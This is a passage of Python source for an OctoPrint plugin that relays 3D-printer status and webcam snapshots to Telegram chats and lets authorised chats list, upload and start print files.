change?\",\n\t\t\t\t\t\t\t\t\theight=self.main._settings.get_float([\"notification_height\"]),\n\t\t\t\t\t\t\t\t\ttime=self.main._settings.get_int([\"notification_time\"]))\n\t\t\t\t\t\t\t\tself.main.send_msg(msg, responses=[gettext(\"Change notification height\"), gettext(\"Change notification time\"), gettext(\"None\")],chatID=chat_id)\n\t\t\t\t\t\t\telif command==gettext(\"None\"):\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"OK.\"),chatID=chat_id)\n\t\t\t\t\t\t\telif command==gettext(\"Change notification height\"):\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Please enter new notification height.\"), force_reply=True,chatID=chat_id)\n\t\t\t\t\t\t\telif command==gettext(\"Please enter new notification height.\") and parameter:\n\t\t\t\t\t\t\t\tself.main._settings.set_float(['notification_height'], parameter, force=True)\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Notification height is now %(height)fmm.\", height=self.main._settings.get_float(['notification_height'])),chatID=chat_id)\n\t\t\t\t\t\t\telif command==gettext(\"Change notification time\"):\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Please enter new notification time.\"), force_reply=True,chatID=chat_id)\n\t\t\t\t\t\t\telif 
command==gettext(\"Please enter new notification time.\") and parameter:\n\t\t\t\t\t\t\t\tself.main._settings.set_int(['notification_time'], parameter, force=True)\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Notification time is now %(time)dmins.\", self.main._settings.get_int(['notification_time'])),chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/list\":\n\t\t\t\t\t\t\t\tself.main.track_action(\"command/list\")\n\t\t\t\t\t\t\t\tfiles = self.get_flat_file_tree()\n\t\t\t\t\t\t\t\tself.main.send_msg(\"File List:\\n\\n\" + \"\\n\".join(files) + \"\\n\\nYou can click the command beginning with /print after a file to start printing this file.\",chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/print\":\n\t\t\t\t\t\t\t\tself.main.send_msg(\"I don't know which file to print. Use /list to get a list of files and click the command beginning with /print after the correct file.\",chatID=chat_id)\n\t\t\t\t\t\t\telif command.startswith(\"/print_\"):\n\t\t\t\t\t\t\t\tself.main.track_action(\"command/print\")\n\t\t\t\t\t\t\t\thash = command[7:]\n\t\t\t\t\t\t\t\tself._logger.debug(\"Looking for hash: %s\", hash)\n\t\t\t\t\t\t\t\tdestination, file = self.find_file_by_hash(hash)\n\t\t\t\t\t\t\t\tself._logger.debug(\"Destination: %s\", destination)\n\t\t\t\t\t\t\t\tself._logger.debug(\"File: %s\", file)\n\t\t\t\t\t\t\t\tif file is None:\n\t\t\t\t\t\t\t\t\tself.main.send_msg(\"I'm sorry, but I couldn't find the file you wanted me to print. Perhaps you want to have a look at /list again?\",chatID=chat_id)\n\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\tself._logger.debug(\"data: %s\", self.main._printer.get_current_data())\n\t\t\t\t\t\t\t\tself._logger.debug(\"state: %s\", self.main._printer.get_current_job())\n\t\t\t\t\t\t\t\tif destination==octoprint.filemanager.FileDestinations.SDCARD:\n\t\t\t\t\t\t\t\t\tself.main._printer.select_file(file, True, printAfterSelect=False)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tfile = self.main._file_manager.path_on_disk(octoprint.filemanager.FileDestinations.LOCAL, file)\n\t\t\t\t\t\t\t\t\tself._logger.debug(\"Using full path: %s\", file)\n\t\t\t\t\t\t\t\t\tself.main._printer.select_file(file, False, printAfterSelect=False)\n\t\t\t\t\t\t\t\tdata = self.main._printer.get_current_data()\n\t\t\t\t\t\t\t\tif data['job']['file']['name'] is not None:\n\t\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Okay. The file %(file)s is loaded. Do you want me to start printing it now?\", file=data['job']['file']['name']), responses=[gettext(\"Yes, start printing, please.\"), gettext(\"Nope.\")],chatID=chat_id)\n\t\t\t\t\t\t\telif command==gettext(\"Yes, start printing, please.\"):\n\t\t\t\t\t\t\t\tdata = self.main._printer.get_current_data()\n\t\t\t\t\t\t\t\tif data['job']['file']['name'] is None:\n\t\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Uh oh... No file is selected for printing. Did you select one using /list?\"),chatID=chat_id)\n\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\tif not self.main._printer.is_operational():\n\t\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Can't start printing: I'm not connected to a printer.\"),chatID=chat_id)\n\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\tif self.main._printer.is_printing():\n\t\t\t\t\t\t\t\t\tself.main.send_msg(\"A print job is already running. You can't print two thing at the same time. 
Maybe you want to use /abort?\",chatID=chat_id)\n\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\tself.main._printer.start_print()\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Started the print job.\"),chatID=chat_id)\n\t\t\t\t\t\t\telif command==gettext(\"Nope.\"):\n\t\t\t\t\t\t\t\tself.main.send_msg(\"It's okay. We all make mistakes sometimes.\",chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/upload\":\n\t\t\t\t\t\t\t\tself.main.track_action(\"command/upload_command_that_tells_the_user_to_just_send_a_file\")\n\t\t\t\t\t\t\t\tself.main.send_msg(\"To upload a gcode file, just send it to me.\",chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/light\":\n\t\t\t\t\t\t\t\tself.main._printer.commands(\"M42 P47 S255\")\n\t\t\t\t\t\t\t\tself.main.send_msg(\"I put the lights on.\",chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/darkness\":\n\t\t\t\t\t\t\t\tself.main._printer.commands(\"M42 P47 S0\")\n\t\t\t\t\t\t\t\tself.main.send_msg(\"Lights are off now.\",chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/help\":\n\t\t\t\t\t\t\t\tself.main.track_action(\"command/help\")\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"You can use following commands:\\n\"\n\t\t\t\t\t\t\t\t \"/abort - Aborts the currently running print. A confirmation is required.\\n\"\n\t\t\t\t\t\t\t\t \"/shutup - Disables automatic notifications till the next print ends.\\n\"\n\t\t\t\t\t\t\t\t \"/imsorrydontshutup - The opposite of /shutup - Makes the bot talk again.\\n\"\n\t\t\t\t\t\t\t\t \"/status - Sends the current status including a current photo.\\n\"\n\t\t\t\t\t\t\t\t \"/settings - Displays the current notification settings and allows you to change them.\"),chatID=chat_id)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself._logger.warn(\"Previous command was from an unknown user.\")\n\t\t\t\t\t\t\tself.main.send_msg(\"You are not allowed to do this!\",chatID=chat_id)\n\t\t\t\t\telif \"document\" in message['message']:\n\t\t\t\t\t\tself.main.track_action(\"command/upload\")\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tfile_name = message['message']['document']['file_name']\n\t\t\t\t\t\t\tif not (file_name.lower().endswith('.gcode') or file_name.lower().endswith('.gco') or file_name.lower().endswith('.g')):\n\t\t\t\t\t\t\t\tself.main.send_msg(\"Sorry, I only accept files with .gcode, .gco or .g extension.\")\n\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t# download the file\n\t\t\t\t\t\t\tdata = self.main.get_file(message['message']['document']['file_id'])\n\t\t\t\t\t\t\t# self.main._file_manager.add_folder(octoprint.filemanager.FileDestinations.LOCAL, \"telegram_uploads\", ignore_existing=True)\n\t\t\t\t\t\t\tstream = octoprint.filemanager.util.StreamWrapper(file_name, io.BytesIO(data))\n\t\t\t\t\t\t\t# self.main._file_manager.add_file(octoprint.filemanager.FileDestinations.LOCAL, \"telegram_uploads/{}\".format(file_name), stream, allow_overwrite=True)\n\t\t\t\t\t\t\ttarget_filename = \"telegram_\" + file_name\n\t\t\t\t\t\t\tself.main._file_manager.add_file(octoprint.filemanager.FileDestinations.LOCAL, target_filename, stream, allow_overwrite=True)\n\t\t\t\t\t\t\tself.main.send_msg(\"I've successfully saved the file you sent me as {}.\".format(target_filename))\n\t\t\t\t\t\texcept Exception as ex:\n\t\t\t\t\t\t\tself.main.send_msg(\"Something went wrong during processing of your file. Sorry. More details are in octoprint.log.\")\n\t\t\t\t\t\t\tself._logger.debug(\"Exception occurred during processing of a file: \" + traceback.format_exc())\n\t\t\t\t\telse:\n\t\t\t\t\t\tself._logger.warn(\"Got an unknown message. Doing nothing. 
Data: \" + str(msg))\n\t\t\texcept Exception as ex:\n\t\t\t\tself._logger.error(\"Exception caught! \" + str(ex))\n\t\t\t\n\t\t\tself.set_status(gettext(\"Connected as %(username)s.\", username=self.username), ok=True)\n\t\t\t\t\n\t\t\tif self.first_contact:\n\t\t\t\tself.first_contact = False\n\t\t\t\tif self.main._settings.get_boolean([\"message_at_startup\"]):\n\t\t\t\t\tself.main.send_msg(gettext(\"Hello. I'm online and ready to receive your commands.\"))\n\t\tself._logger.debug(\"Listener exits NOW.\")\n\t\n\tdef stop(self):\n\t\tself.do_stop = True\n\t\n\tdef set_status(self, status, ok=False):\n\t\tif status != self.main.connection_state_str:\n\t\t\tif self.do_stop:\n\t\t\t\tself._logger.debug(\"Would set status but do_stop is True: %s\", status)\n\t\t\t\treturn\n\t\t\tif ok:\n\t\t\t\tself._logger.debug(\"Setting status: %s\", status)\n\t\t\telse:\n\t\t\t\tself._logger.error(\"Setting status: %s\", status)\n\t\tself.connection_ok = ok\n\t\tself.main.connection_state_str = status\n\n\tdef get_flat_file_tree(self):\n\t\ttree = self.main._file_manager.list_files(recursive=True)\n\t\tarray = []\n\t\tfor key in tree:\n\t\t\tarray.append(key + \":\")\n\t\t\tarray.extend(sorted(self.flatten_file_tree_recursively(tree[key])))\n\t\treturn array\n\t\t\t\n\tdef flatten_file_tree_recursively(self, tree, base=\"\"):\n\t\tarray = []\n\t\tfor key in tree:\n\t\t\tif tree[key]['type']==\"folder\":\n\t\t\t\tarray.extend(self.flatten_file_tree_recursively(tree[key]['children'], base=base+key+\"/\"))\n\t\t\telif tree[key]['type']==\"machinecode\":\n\t\t\t\tarray.append(base+key + \" - /print_\" + tree[key]['hash'][0:8])\n\t\t\telse:\n\t\t\t\tarray.append(base+key)\n\t\treturn array\n\t\n\tdef find_file_by_hash(self, hash):\n\t\ttree = self.main._file_manager.list_files(recursive=True)\n\t\tfor key in tree:\n\t\t\tresult = self.find_file_by_hash_recursively(tree[key], hash)\n\t\t\tif result is not None:\n\t\t\t\treturn key, result\n\t\treturn None, None\n\t\n\tdef find_file_by_hash_recursively(self, tree, hash, base=\"\"):\n\t\tfor key in tree:\n\t\t\tif tree[key]['type']==\"folder\":\n\t\t\t\tresult = self.find_file_by_hash_recursively(tree[key]['children'], hash, base=base+key+\"/\")\n\t\t\t\tif result is not None:\n\t\t\t\t\treturn result\n\t\t\t\tcontinue\n\t\t\tif tree[key]['hash'].startswith(hash):\n\t\t\t\treturn base+key\n\t\treturn None\n\nclass TelegramPluginLoggingFilter(logging.Filter):\n\tdef filter(self, record):\n\t\tfor match in re.findall(\"[0-9]+:[a-zA-Z0-9_\\-]+\", record.msg):\n\t\t\tnew = re.sub(\"[0-9]\", \"1\", re.sub(\"[a-z]\", \"a\", re.sub(\"[A-Z]\", \"A\", match)))\n\t\t\trecord.msg = record.msg.replace(match, new)\n\t\treturn True\n\nclass TelegramPlugin(octoprint.plugin.EventHandlerPlugin,\n octoprint.plugin.SettingsPlugin,\n octoprint.plugin.StartupPlugin,\n octoprint.plugin.ShutdownPlugin,\n octoprint.plugin.TemplatePlugin,\n octoprint.plugin.SimpleApiPlugin,\n octoprint.plugin.AssetPlugin):\n\tdef __init__(self):\n\t\tself.thread = None\n\t\tself.last_z = 0.0\n\t\tself.last_notification_time = 0\n\t\tself.bot_url = None\n\t\tself.first_contact = True\n\t\tself.chats = {}\n\t\tself.shut_up = False\n\t\tself.connection_state_str = gettext(\"Disconnected.\")\n\t\tself.connection_ok = False\n\t\trequests.packages.urllib3.disable_warnings()\n\n\tdef start_listening(self):\n\t\tif self._settings.get(['token']) != \"\" and self.thread is None:\n\t\t\tself._logger.debug(\"Starting listener.\")\n\t\t\tself.bot_url = \"https://api.telegram.org/bot\" + 
self._settings.get(['token'])\n\t\t\tself.bot_file_url = \"https://api.telegram.org/file/bot\" + self._settings.get(['token'])\n\t\t\tself.thread = TelegramListener(self)\n\t\t\tself.thread.daemon = True\n\t\t\tself.thread.start()\n\t\n\tdef stop_listening(self):\n\t\tif self.thread is not None:\n\t\t\tself._logger.debug(\"Stopping listener.\")\n\t\t\tself.thread.stop()\n\t\t\tself.thread = None\n\t\n\tdef on_after_startup(self):\n\t\tself.set_log_level()\n\t\tself._logger.addFilter(TelegramPluginLoggingFilter())\n\t\tself.start_listening()\n\t\tself.track_action(\"started\")\n\t\tself.chats = self._settings.get([\"chats\"])\n\t\n\tdef on_shutdown(self):\n\t\tif self._settings.get_boolean([\"message_at_shutdown\"]):\n\t\t\tself.send_msg(gettext(\"Shutting down. Goodbye.\"))\n\t\n\tdef set_log_level(self):\n\t\tself._logger.setLevel(logging.DEBUG if self._settings.get_boolean([\"debug\"]) else logging.NOTSET)\n\t\n\tdef get_settings_preprocessors(self):\n\t\treturn dict(), dict(\n\t\t\tnotification_height=lambda x: float(x),\n\t\t\tnotification_time=lambda x: int(x)\n\t\t)\n\t\n\tdef on_settings_save(self, data):\n\t\tdata['chats'] = self.chats\n\t\tself._logger.debug(\"Saving data: \" + str(data))\n\t\tdata['token'] = data['token'].strip()\n\t\tif not re.match(\"^[0-9]+:[a-zA-Z0-9_\\-]+$\", data['token']):\n\t\t\tself._logger.error(\"Not saving token because it doesn't seem to have the right format.\")\n\t\t\tself.connection_state_str = gettext(\"The previously entered token doesn't seem to have the correct format. It should look like this: 12345678:AbCdEfGhIjKlMnOpZhGtDsrgkjkZTCHJKkzvjhb\")\n\t\t\tdata['token'] = \"\"\n\t\told_token = self._settings.get([\"token\"])\n\t\tif not data['tracking_activated']:\n\t\t\tdata['tracking_token'] = None\n\t\toctoprint.plugin.SettingsPlugin.on_settings_save(self, data)\n\t\tself.set_log_level()\n\t\tif data['token']!=old_token:\n\t\t\tself.stop_listening()\n\t\tif data['token']!=\"\":\n\t\t\tself.start_listening()\n\t\telse:\n\t\t\tself.connection_state_str = gettext(\"No token given.\")\n\t\n\tdef get_settings_defaults(self):\n\t\treturn dict(\n\t\t\ttoken = \"\",\n\t\t\tnotification_height = 5.0,\n\t\t\tnotification_time = 15,\n\t\t\tmessage_at_startup = True,\n\t\t\tmessage_at_shutdown = True,\n\t\t\tmessage_at_print_started = True,\n\t\t\tmessage_at_print_done = True,\n\t\t\tmessage_at_print_done_delay = 0,\n\t\t\tmessage_at_print_failed = True,\n\t\t\tmessages = dict(\n\t\t\t\tPrintStarted = gettext(\"Started printing {file}.\"),\n\t\t\t\tPrintFailed = gettext(\"Printing {file} failed.\"),\n\t\t\t\tZChange = gettext(\"Printing at Z={z}.\\nBed {bed_temp}/{bed_target}, Extruder {e1_temp}/{e1_target}.\\n{time_done}, {percent}%% done, {time_left} remaining.\"),\n\t\t\t\tPrintDone = gettext(\"Finished printing {file}.\"),\n\t\t\t\tTelegramSendNotPrintingStatus = gettext(\"Not printing.\\nBed {bed_temp}/{bed_target}, Extruder {e1_temp}/{e1_target}.\")\n\t\t\t),\n\t\t\ttracking_activated = False,\n\t\t\ttracking_token = None,\n\t\t\tchats = dict(), \n\t\t\tdebug = False\n\t\t)\n\t\n\tdef get_template_configs(self):\n\t\treturn [\n\t\t\tdict(type=\"settings\", name=\"Telegram\", custom_bindings=True)\n\t\t]\n\t\n\tdef get_update_information(self, *args, **kwargs):\n\t\treturn 
dict(\n\t\t\ttelegram=dict(\n\t\t\t\tdisplayName=self._plugin_name,\n\t\t\t\tdisplayVersion=self._plugin_version,\n\t\t\t\t\n\t\t\t\ttype=\"github_release\",\n\t\t\t\tcurrent=self._plugin_version,\n\t\t\t\tuser=\"fabianonline\",\n\t\t\t\trepo=\"OctoPrint-Telegram\",\n\t\t\t\t\n\t\t\t\tpip=\"https://github.com/fabianonline/OctoPrint-Telegram/archive/{target}.zip\"\n\t\t\t)\n\t\t)\n\t\n\tdef is_notification_necessary(self, new_z, old_z):\n\t\ttimediff = self._settings.get_int(['notification_time'])\n\t\tif timediff and timediff > 0:\n\t\t\t# check the timediff\n\t\t\tif self.last_notification_time + timediff*60 <= time.time():\n\t\t\t\treturn True\n\t\tzdiff = self._settings.get_float(['notification_height'])\n\t\tif zdiff and zdiff > 0.0:\n\t\t\tif old_z is None:\n\t\t\t\treturn False\n\t\t\t# check the zdiff\n\t\t\tif abs(new_z - (old_z or 0.0)) >= 2.0:\n\t\t\t\t# big changes in height are not interesting for notifications - we ignore them\n\t\t\t\tself.last_z = new_z\n\t\t\t\treturn False\n\t\t\tif new_z >= self.last_z + zdiff or new_z < self.last_z:\n\t\t\t\treturn True\n\t\treturn False\n\t\t\n\tdef on_event(self, event, payload, *args, **kwargs):\n\t\ttry:\n\t\t\tif event != \"PrintDone\" and event != \"PrintStarted\" and event != \"ZChange\" and event!=\"PrintFailed\" and event!=\"TelegramSendPrintingStatus\" and event!=\"TelegramSendNotPrintingStatus\":\n\t\t\t\t# return as fast as possible\n\t\t\t\treturn\n\t\t\t\n\t\t\tself._logger.debug(\"Got an event: \" + event + \" Payload: \" + str(payload))\n\t\t\t# PrintFailed Payload: {'origin': 'local', 'file': u'cube.gcode'}\n\t\t\t# MovieDone Payload: {'gcode': u'cube.gcode', 'movie_basename': 'cube_20160216125143.mpg', 'movie': '/home/pi/.octoprint/timelapse/cube_20160216125143.mpg'}\n\t\t\t\n\t\t\tz = \"\"\n\t\t\tfile = \"\"\n\t\t\n\t\t\tstatus = self._printer.get_current_data()\n\t\t\tdelay = 0\n\t\t\ttrack = True\n\t\t\tif event==\"ZChange\":\n\t\t\t\tif not status['state']['flags']['printing']:\n\t\t\t\t\treturn\n\t\t\t\tz = payload['new']\n\t\t\t\tself._logger.debug(\"Z-Change. 
new_z=%.2f old_z=%.2f last_z=%.2f notification_height=%.2f notification_time=%d\",\n\t\t\t\t\tz,\n\t\t\t\t\tpayload['old'],\n\t\t\t\t\tself.last_z,\n\t\t\t\t\tself._settings.get_float(['notification_height']),\n\t\t\t\t\tself._settings.get_int(['notification_time']))\n\t\t\t\t\n\t\t\t\tif not self.is_notification_necessary(payload['new'], payload['old']):\n\t\t\t\t\treturn\n\t\t\telif event==\"PrintStarted\":\n\t\t\t\tself.last_z = 0.0\n\t\t\t\tself.last_notification_time = time.time()\n\t\t\t\tif not self._settings.get_boolean([\"message_at_print_started\"]):\n\t\t\t\t\treturn\n\t\t\telif event==\"PrintDone\":\n\t\t\t\tif self.shut_up:\n\t\t\t\t\tself.shut_up = False\n\t\t\t\t\treturn\n\t\t\t\tif not self._settings.get_boolean([\"message_at_print_done\"]):\n\t\t\t\t\treturn\n\t\t\t\tdelay = self._settings.get_int([\"message_at_print_done_delay\"])\n\t\t\telif event==\"PrintFailed\":\n\t\t\t\tif self.shut_up:\n\t\t\t\t\tself.shut_up = False\n\t\t\t\t\treturn\n\t\t\t\tif not self._settings.get_boolean([\"message_at_print_failed\"]):\n\t\t\t\t\treturn\n\t\t\telif event==\"TelegramSendPrintingStatus\":\n\t\t\t\tz = payload['z']\n\t\t\t\t# Change the event type in order to generate a ZChange message\n\t\t\t\tevent = \"ZChange\"\n\t\t\t\ttrack = False\n\t\t\telif event==\"TelegramSendNotPrintingStatus\":\n\t\t\t\ttrack = False\n\t\t\t\n\t\t\tself.last_notification_time = time.time()\n\t\t\tself.last_z = z\n\t\t\t\t\n\t\t\tif self.shut_up:\n\t\t\t\treturn\n\t\t\t\n\t\t\tself._logger.debug(str(status))\n\t\t\ttemps = self._printer.get_current_temperatures()\n\t\t\tself._logger.debug(str(temps))\n\t\t\tbed_temp = temps['bed']['actual'] if 'bed' in temps else 0.0\n\t\t\tbed_target = temps['bed']['target'] if 'bed' in temps else 0.0 \n\t\t\te1_temp = temps['tool0']['actual']\n\t\t\te1_target = temps['tool0']['target']\n\t\t\te2_temp = e2_target = None\n\t\t\tif \"tool1\" in temps:\n\t\t\t\te2_temp = temps['tool1']['actual']\n\t\t\t\te2_target = temps['tool1']['target']\n\t\t\tpercent = int(status['progress']['completion'] or 0)\n\t\t\ttime_done = octoprint.util.get_formatted_timedelta(datetime.timedelta(seconds=(status['progress']['printTime'] or 0)))\n\t\t\ttime_left = octoprint.util.get_formatted_timedelta(datetime.timedelta(seconds=(status['progress']['printTimeLeft'] or 0)))\n\t\t\t\n\t\t\tif \"file\" in payload: file = payload[\"file\"]\n\t\t\tif \"gcode\" in payload: file = payload[\"gcode\"]\n\t\t\tif \"filename\" in payload: file = payload[\"filename\"]\n\t\t\tmessage = self._settings.get([\"messages\", event]).format(**locals())\n\t\t\tself._logger.debug(\"Sending message: \" + message)\n\t\t\tif \"chatID\" in kwargs:\n\t\t\t\tself.send_msg(message, with_image=True, delay=delay,chatID=kwargs['chatID'])\n\t\t\telse:\n\t\t\t\tself.send_msg(message, with_image=True, delay=delay)\n\t\t\tif track:\n\t\t\t\tself.track_action(\"notification/\" + event)\n\t\texcept Exception as e:\n\t\t\tself._logger.debug(\"Exception: \" + str(e))\n\t\n\tdef send_msg(self, message, **kwargs):\n\t\tkwargs['message'] = message\n\t\t# start() (not run()) so sending and any configured delay happen off the caller's thread\n\t\tthreading.Thread(target=self._send_msg, kwargs=kwargs).start()\n\n\tdef _send_msg(self, message=\"\", with_image=False, responses=None, force_reply=False, delay=0, chatID = \"\"):\n\t\tif delay > 0:\n\t\t\ttime.sleep(delay)\n\t\ttry:\n\t\t\tself._logger.debug(\"Sending a message: \" + message.replace(\"\\n\", \"\\\\n\") + \" with_image=\" + str(with_image) + \" chatID= \" + str(chatID))\n\t\t\tdata = {}\n\t\t\t# We always send hide_keyboard unless we send an actual 
keyboard\n\t\t\tdata['reply_markup'] = json.dumps({'hide_keyboard': True}) \n\n\t\t\tif force_reply:\n\t\t\t\tdata['reply_markup'] = json.dumps({'force_reply': True})\n\t\t\tif responses:\n\t\t\t\tkeyboard = {'keyboard':map(lambda x: [x], responses), 'one_time_keyboard': True}\n\t\t\t\tdata['reply_markup'] = json.dumps(keyboard)\n\t\t\timage_data = None\n\t\t\tif with_image:\n\t\t\t\timage_data = self.take_image()\n\t\t\tself._logger.debug(\"data so far: \" + str(data))\n\t\t\tif image_data:\n\t\t\t\tself._logger.debug(\"Sending with image.\")\n\t\t\t\tfiles = {'photo':(\"image.jpg\", image_data)}\n\t\t\t\tdata['caption'] = message\n\t\t\t\tif chatID == \"\":\n\t\t\t\t\tchats = self._settings.get(['chats'])\n\t\t\t\t\tfor key in chats:\n\t\t\t\t\t\tif chats[key]['send_notifications'] is True:\n\t\t\t\t\t\t\tdata['chat_id'] = key\n\t\t\t\t\t\t\tself._logger.debug(\"Sending... \" + str(key))\n\t\t\t\t\t\t\tr = requests.post(self.bot_url + \"/sendPhoto\", files=files, data=data)\n\t\t\t\t\t\t\tself._logger.debug(\"Sending finished. \" + str(r.status_code) + \" \" + str(r.content))\n\t\t\t\telse:\n\t\t\t\t\tdata['chat_id'] = chatID\n\t\t\t\t\tr = requests.post(self.bot_url + \"/sendPhoto\", files=files, data=data)\n\t\t\t\t\tself._logger.debug(\"Sending finished. \" + str(r.status_code) + \" \" + str(r.content))\n\n\t\t\telse:\n\t\t\t\tself._logger.debug(\"Sending without image.\")\n\t\t\t\tdata['text'] = message\n\t\t\t\tif chatID == \"\":\n\t\t\t\t\tchats = self._settings.get(['chats'])\n\t\t\t\t\tfor key in chats:\n\t\t\t\t\t\tif chats[key]['send_notifications'] is True:\n\t\t\t\t\t\t\tdata['chat_id'] = key\n\t\t\t\t\t\t\tself._logger.debug(\"Sending... \" + str(key))\n\t\t\t\t\t\t\trequests.post(self.bot_url + \"/sendMessage\", data=data)\n\t\t\t\telse:\n\t\t\t\t\tdata['chat_id'] = chatID\n\t\t\t\t\trequests.post(self.bot_url + \"/sendMessage\", data=data)\n\t\texcept Exception as ex:\n\t\t\tself._logger.debug(\"Caught an exception in send_msg(): \" + str(ex))\n\t\n\tdef send_video(self, message, video_file):\n\t\tfiles = {'video': open(video_file, 'rb')}\n\t\t#r = requests.post(self.bot_url + \"/sendVideo\", files=files, data={'chat_id':self._settings.get([\"chat\"]), 'caption':message}) #############################HIER\n\t\t#self._logger.debug(\"Sending finished. \" + str(r.status_code) + \" \" + str(r.content)) # disabled: r is undefined while the request above is commented out\n\t\n\tdef get_file(self, file_id):\n\t\tself._logger.debug(\"Requesting file with id %s.\", file_id)\n\t\tr = requests.get(self.bot_url + \"/getFile\", data={'file_id': file_id})\n\t\t# {\"ok\":true,\"result\":{\"file_id\":\"BQADAgADCgADrWJxCW_eFdzxDPpQAg\",\"file_size\":26,\"file_path\":\"document\\/file_3.gcode\"}}\n\t\tr.raise_for_status()\n\t\tdata = r.json()\n\t\tif not \"ok\" in data:\n\t\t\traise Exception(gettext(\"Telegram didn't respond well to getFile. 
The response was: %(response)s\", response=r.text))\n\t\turl = self.bot_file_url + \"/\" + data['result']['file_path']\n\t\tself._logger.debug(\"Downloading file: %s\", url)\n\t\tr = requests.get(url)\n\t\tr.raise_for_status()\n\t\treturn r.content\n\n\tdef take_image(self):\n\t\tsnapshot_url = self._settings.global_get([\"webcam\", \"snapshot\"])\n\t\tself._logger.debug(\"Snapshot URL: \" + str(snapshot_url))\n\t\tdata = None\n\t\tif snapshot_url:\n\t\t\ttry:\n\t\t\t\tr = requests.get(snapshot_url)\n\t\t\t\tdata = r.content\n\t\t\texcept Exception as e:\n\t\t\t\treturn None\n\t\tflipH = self._settings.global_get([\"webcam\", \"flipH\"])\n\t\tflipV = self._settings.global_get([\"webcam\", \"flipV\"])\n\t\trotate= self._settings.global_get([\"webcam\", \"rotate90\"])\n\t\t\n\t\tif flipH or flipV or rotate:\n\t\t\timage = Image.open(StringIO.StringIO(data))\n\t\t\tif rotate:\n\t\t\t\timage = image.transpose(Image.ROTATE_90)\n\t\t\tif flipH:\n\t\t\t\timage = image.transpose(Image.FLIP_LEFT_RIGHT)\n\t\t\tif flipV:\n\t\t\t\timage = image.transpose(Image.FLIP_TOP_BOTTOM)\n\t\t\toutput = StringIO.StringIO()\n\t\t\timage.save(output, format=\"JPEG\")\n\t\t\tdata = output.getvalue()\n\t\t\toutput.close()\n\t\treturn data\n\t\n\tdef test_token(self, token=None):\n\t\tif token is None:\n\t\t\ttoken = self._settings.get([\"token\"])\n\t\tresponse = requests.get(\"https://api.telegram.org/bot\" + token + \"/getMe\")\n\t\tself._logger.debug(\"getMe returned: \" + str(response.json()))\n\t\tself._logger.debug(\"getMe status code: \" + str(response.status_code))\n\t\tjson = response.json()\n\t\tif not 'ok' in json or not json['ok']:\n\t\t\tif json['description']:\n\t\t\t\traise(Exception(gettext(\"Telegram returned error code %(error)s: %(message)s\", error=json['error_code'], message=json['description'])))\n\t\t\telse:\n\t\t\t\traise(Exception(gettext(\"Telegram returned an unspecified error.\")))\n\t\telse:\n\t\t\treturn \"@\" + json['result']['username']\n\t\t\t\t\n\tdef get_api_commands(self):\n\t\treturn dict(\n\t\t\ttestToken=[\"token\"],\n\t\t\tupdateChat=[\"ID\"],\n\t\t\tdelChat=[\"ID\"]\n\t\t)\n\t\n\tdef on_api_get(self, request):\n\t\treturn json.dumps({'chats':self.chats, 'connection_state_str':self.connection_state_str, 'connection_ok':self.connection_ok})\n\t\n\tdef on_api_command(self, command, data):\n\t\tif command==\"testToken\":\n\t\t\tself._logger.debug(\"Testing token {}\".format(data['token']))\n\t\t\ttry:\n\t\t\t\tusername = self.test_token(data['token'])\n\t\t\t\treturn json.dumps({'ok': True, 'connection_state_str': gettext(\"Token valid for %(username)s.\", username=username), 'error_msg': None, 'username': username})\n\t\t\texcept Exception as ex:\n\t\t\t\treturn json.dumps({'ok': False, 'connection_state_str': gettext(\"Error: %(error)s\", error=ex), 'username': None, 'error_msg': str(ex)})\n\t\telif command==\"updateChat\":\n\t\t\tstrId = str(data['ID'])\n\t\t\tif strId in self.chats:\t\t\t\t\t\t\t\t\n\t\t\t\tself.chats[strId]['send_notifications'] = data['chatNotify']\n\t\t\t\tself.chats[strId]['accept_commands'] = data['chatCmd']\t\n\t\t\treturn json.dumps({'chats':self.chats, 'connection_state_str':self.connection_state_str, 'connection_ok':self.connection_ok})\n\t\telif command==\"delChat\":\n\t\t\tstrId = str(data['ID'])\n\t\t\tself._logger.debug(\"Deleting Chat ID {}\".format(data['ID']))\n\t\t\tif strId in self.chats:\t\n\t\t\t\tdel self.chats[strId]\n\t\t\t\tself._logger.debug(\"Done Deleting ID {}\".format(data['ID']))\n\t\t\treturn json.dumps({'chats':self.chats, 
'connection_state_str':self.connection_state_str, 'connection_ok':self.connection_ok})\n\n\n\t\n\tdef get_assets(self):\n\t\treturn dict(js=[\"js/telegram.js\"])\n\t\t\n\tdef track_action(self, action):\n\t\tif not self._settings.get_boolean([\"tracking_activated\"]):\n\t\t\treturn\n\t\tif self._settings.get([\"tracking_token\"]) is None:\n\t\t\ttoken = \"\".join(random.choice(\"abcdef0123456789\") for i in xrange(16))\n\t\t\tself._settings.set([\"tracking_token\"], token)\n\t\tparams = {'idsite': '3', 'rec': '1', 'url': 'http://octoprint-telegram/'+action, 'action_name': (\"%20/%20\".join(action.split(\"/\"))), '_id': self._settings.get([\"tracking_token\"])}\n\t\tthreading.Thread(target=requests.get, args=(\"http://piwik.schlenz.ruhr/piwik.php\",), kwargs={'params': params}).start()\n\n__plugin_name__ = \"Telegram Notifications\"\n__plugin_implementation__ = TelegramPlugin()\n__plugin_hooks__ = 